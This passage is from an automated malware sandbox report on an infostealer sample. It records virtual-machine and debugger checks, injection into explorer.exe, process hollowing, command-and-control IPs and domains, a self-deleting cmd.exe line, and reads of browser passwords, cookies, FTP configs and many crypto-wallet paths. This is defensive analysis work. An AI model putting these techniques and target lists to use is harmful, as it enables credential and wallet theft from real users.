                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: global block list test formVMware20,11696494690
                    Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?n
                    Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: IEBAAF.12.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: IEBAAF.12.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: IEBAAF.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: IEBAAF.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: IEBAAF.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: IEBAAF.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: IEBAAF.12.drBinary or memory string: discord.comVMware20,11696494690f
                    Source: IEBAAF.12.drBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                    Source: IEBAAF.12.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: IEBAAF.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: IEBAAF.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: IEBAAF.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: IEBAAF.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: IEBAAF.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: IEBAAF.12.drBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareoItL
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe System information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Roaming\etrtabd System information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\etrtabd Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_007A2D2F rdtsc 7_2_007A2D2F
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,0_2_00403406
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6D19AC62
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0211092B mov eax, dword ptr fs:[00000030h] 0_2_0211092B
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02110D90 mov eax, dword ptr fs:[00000030h] 0_2_02110D90
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02155A27 push dword ptr fs:[00000030h] 0_2_02155A27
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_020C092B mov eax, dword ptr fs:[00000030h] 6_2_020C092B
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_020C0D90 mov eax, dword ptr fs:[00000030h] 6_2_020C0D90
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02205FC7 push dword ptr fs:[00000030h] 6_2_02205FC7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0079DAB3 push dword ptr fs:[00000030h] 7_2_0079DAB3
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0212092B mov eax, dword ptr fs:[00000030h] 7_2_0212092B
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02120D90 mov eax, dword ptr fs:[00000030h] 7_2_02120D90
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0040BD58 LocalReAlloc,InterlockedExchange,RtlDeleteCriticalSection,InitAtomTable,WriteConsoleOutputA,ReadFileScatter,GetModuleFileNameW,RaiseException,RtlInterlockedPopEntrySList,FileTimeToSystemTime,SetCalendarInfoA,SetConsoleMode,GetFileAttributesW,CompareStringW,ActivateActCtx,LoadLibraryA,EnumTimeFormatsW,GetProcessHeaps,0_2_0040BD58

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\explorer.exe File created: EE6.exe.2.dr
                    Source: C:\Windows\explorer.exe Network Connect: 109.175.29.39 80
                    Source: C:\Windows\explorer.exe Network Connect: 190.13.174.94 80
                    Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
                    Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
                    Source: C:\Windows\explorer.exe Network Connect: 190.147.128.172 80
                    Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
                    Source: Yara match File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory allocated: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,11_2_0427A4F0
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Thread created: C:\Windows\explorer.exe EIP: 89B19E0
                    Source: C:\Users\user\AppData\Roaming\etrtabd Thread created: unknown EIP: 8BD19E0
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 value starts with: 4D5A
                    Source: 5876.exeString found in binary or memory: zippyfinickysofwps.shop
                    Source: 5876.exeString found in binary or memory: obsceneclassyjuwks.shop
                    Source: 5876.exeString found in binary or memory: acceptabledcooeprs.shop
                    Source: 5876.exeString found in binary or memory: whispedwoodmoodsksl.shop
                    Source: 5876.exeString found in binary or memory: boredimperissvieos.shop
                    Source: 5876.exeString found in binary or memory: holicisticscrarws.shop
                    Source: 5876.exeString found in binary or memory: sweetsquarediaslw.shop
                    Source: 5876.exeString found in binary or memory: plaintediousidowsko.shop
                    Source: 5876.exeString found in binary or memory: miniaturefinerninewjs.shop
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section unmapped: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base address: 400000
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 401000
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 422000
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 42E000
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 641000
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,12_2_6D1E4760
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,12_2_6D0C1C30
                    Source: explorer.exe, 00000002.00000000.1401510441.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                    Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19AE71 cpuid 12_2_6D19AE71
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: GetLocaleInfoA,0_2_0040B534
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: GetLocaleInfoA,6_2_0040B534
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_6D19A8DC
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E8390 NSS_GetVersion,12_2_6D0E8390
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058443269.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: \\config\
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
